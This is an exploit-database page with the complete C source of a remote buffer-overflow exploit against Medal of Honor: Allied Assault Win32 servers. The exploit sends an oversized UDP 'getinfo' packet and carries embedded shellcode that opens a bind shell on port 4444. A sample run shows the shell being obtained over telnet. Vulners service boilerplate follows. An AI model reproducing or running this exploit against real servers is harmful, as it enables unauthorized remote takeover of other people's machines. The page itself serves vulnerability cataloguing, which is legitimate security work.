Vulners
Lucene search
Medal of Honor (getinfo) Remote Buffer Overflow Exploit
/*
MOHAA Win32 Server Buffer-Overflow Exploit (getinfo)
Written by RunningBon
Please use this responsibly, as I am not responsible for any damage you cause by using it.
IRC: irc.rizon.net #kik
E-mail: [email protected]
Thanks to: Luigi Auriemma, Metasploit, everyone else (You know who you are.)
Example:
C:\>MOHAAExploit.exe 192.168.2.44 12203 MOHAA-v1.11
MoHAA Server Buffer overflow exploit
Written by RunningBon
E-Mail: [email protected]
IRC: irc.rizon.net #kik
Attempting to exploit 192.168.2.44:12203, running version MOHAA-v1.11.
Building packet.
Sending packet.
Packet sent.
Check for your shell on port 4444.
C:\>telnet 192.168.2.44 4444
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Program Files\EA GAMES\MOHAA>
*/
#include <stdio.h>
#include <windows.h>
struct VersionStruct {
char *pName;
DWORD dwNewEIP;
DWORD dwFillLength;
};
VersionStruct Versions[] = {
"MOHAA-v1.11", 0xCBB935, 516,
"MOHAA:S-v2.15", 0x923575, 516,
//Add MOHAA:Breakthrough support
};
#pragma comment (lib, "ws2_32.lib")
//Port 4444 bindshell
unsigned char szShellcode[] =
"\x2b\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x42"
"\xec\xee\x81\x83\xeb\xfc\xe2\xf4\xbe\x86\x05\xcc\xaa\x15\x11\x7e"
"\xbd\x8c\x65\xed\x66\xc8\x65\xc4\x7e\x67\x92\x84\x3a\xed\x01\x0a"
"\x0d\xf4\x65\xde\x62\xed\x05\xc8\xc9\xd8\x65\x80\xac\xdd\x2e\x18"
"\xee\x68\x2e\xf5\x45\x2d\x24\x8c\x43\x2e\x05\x75\x79\xb8\xca\xa9"
"\x37\x09\x65\xde\x66\xed\x05\xe7\xc9\xe0\xa5\x0a\x1d\xf0\xef\x6a"
"\x41\xc0\x65\x08\x2e\xc8\xf2\xe0\x81\xdd\x35\xe5\xc9\xaf\xde\x0a"
"\x02\xe0\x65\xf1\x5e\x41\x65\xc1\x4a\xb2\x86\x0f\x0c\xe2\x02\xd1"
"\xbd\x3a\x88\xd2\x24\x84\xdd\xb3\x2a\x9b\x9d\xb3\x1d\xb8\x11\x51"
"\x2a\x27\x03\x7d\x79\xbc\x11\x57\x1d\x65\x0b\xe7\xc3\x01\xe6\x83"
"\x17\x86\xec\x7e\x92\x84\x37\x88\xb7\x41\xb9\x7e\x94\xbf\xbd\xd2"
"\x11\xbf\xad\xd2\x01\xbf\x11\x51\x24\x84\xff\xdd\x24\xbf\x67\x60"
"\xd7\x84\x4a\x9b\x32\x2b\xb9\x7e\x94\x86\xfe\xd0\x17\x13\x3e\xe9"
"\xe6\x41\xc0\x68\x15\x13\x38\xd2\x17\x13\x3e\xe9\xa7\xa5\x68\xc8"
"\x15\x13\x38\xd1\x16\xb8\xbb\x7e\x92\x7f\x86\x66\x3b\x2a\x97\xd6"
"\xbd\x3a\xbb\x7e\x92\x8a\x84\xe5\x24\x84\x8d\xec\xcb\x09\x84\xd1"
"\x1b\xc5\x22\x08\xa5\x86\xaa\x08\xa0\xdd\x2e\x72\xe8\x12\xac\xac"
"\xbc\xae\xc2\x12\xcf\x96\xd6\x2a\xe9\x47\x86\xf3\xbc\x5f\xf8\x7e"
"\x37\xa8\x11\x57\x19\xbb\xbc\xd0\x13\xbd\x84\x80\x13\xbd\xbb\xd0"
"\xbd\x3c\x86\x2c\x9b\xe9\x20\xd2\xbd\x3a\x84\x7e\xbd\xdb\x11\x51"
"\xc9\xbb\x12\x02\x86\x88\x11\x57\x10\x13\x3e\xe9\xb2\x66\xea\xde"
"\x11\x13\x38\x7e\x92\xec\xee\x81";
void Error(char *pString)
{
printf("[ERROR] %s\n", pString);
ExitProcess(0);
}
int Exploit(char *pIP, int iPort, VersionStruct *pVersion)
{
WSAData WSADATA;
SOCKET Socket = NULL;
sockaddr_in SockAddr;
char szHeader[] = "\xff\xff\xff\xff\x02getinfo ";
char szBuffer[4096];
int iLen = 0;
WSAStartup(MAKEWORD(1, 1), &WSADATA);
if((Socket = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)) == SOCKET_ERROR)
{
Error("socket()");
return 0;
}
SockAddr.sin_addr.s_addr = inet_addr(pIP);
SockAddr.sin_port = htons(iPort);
SockAddr.sin_family = AF_INET;
printf("Building packet.\n");
memset(szBuffer, 0, sizeof(szBuffer));
memcpy(szBuffer, szHeader, sizeof(szHeader) - 1);
iLen += sizeof(szHeader) - 1;
memset(szBuffer + iLen, 'z', pVersion->dwFillLength);
iLen += pVersion->dwFillLength;
memcpy(szBuffer + iLen, (LPVOID)&pVersion->dwNewEIP, sizeof(DWORD));
iLen += sizeof(DWORD);
memcpy(szBuffer + iLen, szShellcode, sizeof(szShellcode));
iLen += sizeof(szShellcode);
printf("Sending packet.\n");
if(sendto(Socket, szBuffer, iLen, 0, (sockaddr*)&SockAddr, sizeof(SockAddr)) == SOCKET_ERROR)
{
Error("sendto()");
return 0;
}
printf("Packet sent.\n");
return 1;
}
void PrintWelcome()
{
printf(
"MoHAA Server Buffer overflow exploit\n"
"Written by RunningBon\n"
"E-Mail: [email protected]\n"
"IRC: irc.rizon.net #kik\n"
"\n"
);
}
void PrintUsage(char *pPath)
{
printf("Usage: %s <IP> <Port> <Version Name>\n\n", pPath);
printf("Supported Version List:\n");
for(int i = 0; i < sizeof(Versions) / sizeof(Versions[0]); i++)
{
printf("%s\n", Versions[i].pName);
}
}
int main(int argc, char **argv)
{
VersionStruct *pVersion = NULL;
PrintWelcome();
if(argc < 4)
{
PrintUsage(argv[0]);
return 0;
}
for(int i = 0; i < sizeof(Versions) / sizeof(Versions[0]); i++)
{
if(!stricmp(argv[3], Versions[i].pName))
{
pVersion = &Versions[i];
break;
}
}
if(pVersion == NULL)
{
Error("Invalid version.");
}
printf("Attempting to exploit %s:%d, running version %s.\n", argv[1], atoi(argv[2]), pVersion->pName);
if(Exploit(argv[1], atoi(argv[2]), pVersion))
{
printf("Check for your shell on port 4444.\n");
}
return 0;
}
// sebug.net
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
10 May 2006 00:00Current
7.1High risk
Vulners AI Score7.1